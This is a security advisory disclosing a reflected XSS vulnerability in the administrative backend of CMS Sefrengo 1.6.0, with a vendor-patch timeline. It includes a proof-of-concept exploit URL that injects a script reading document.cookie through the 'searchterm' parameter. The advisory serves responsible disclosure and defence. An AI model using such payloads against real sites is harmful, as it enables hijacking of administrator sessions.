Advisory: Reflecting XSS vulnerability in CMS Sefrengo v.1.6.0
Advisory ID: SROEADV-2014-06
Author: Steffen Rsemann
Affected Software: CMS Sefrengo v.1.6.0
Vendor URL: http://www.sefrengo.org/
Vendor Status: solved
CVE-ID: -
==========================
Vulnerability Description:
==========================
The CMS Sefrengo v. 1.6.0 contains a reflecting XSS vulnerability in its
administrative backend.
==================
Technical Details:
==================
The CMS Sefrengo v.1.6.0 contains a reflecting XSS vulnerability in its
administrative backend, which resides in the main.php file:
http://{TARGET}/backend/main.php?area=user&idgroup=0&order=&ascdesc=ASC&searchterm=&page=1
Via the parameter "searchterm", an attacker is able to craft a link with
arbitrary HTML- and/or JavaScript-code which gets executed, if clicked on.
Exploit-Example:
http://{TARGET}/backend/main.php?area=user&idgroup=0&order=&ascdesc=ASC&searchterm=<script>alert(document.cookie)</script><!--&page=1
=========
Solution:
=========
Update to the latest version.
====================
Disclosure Timeline:
====================
28-Dec-2014 ? found the vulnerability
28-Dec-2014 - informed the developers
28-Dec-2014 ? release date of this security advisory [without technical
details]
04-Jan-2015 - patch by vendor
04-Jan-2015 - release date of this security advisory
04-Jan-2015 - post to lists
========
Credits:
========
Vulnerability found and advisory written by Steffen Rsemann.
===========
References:
===========
http://www.sefrengo.org/
http://sroesemann.blogspot.de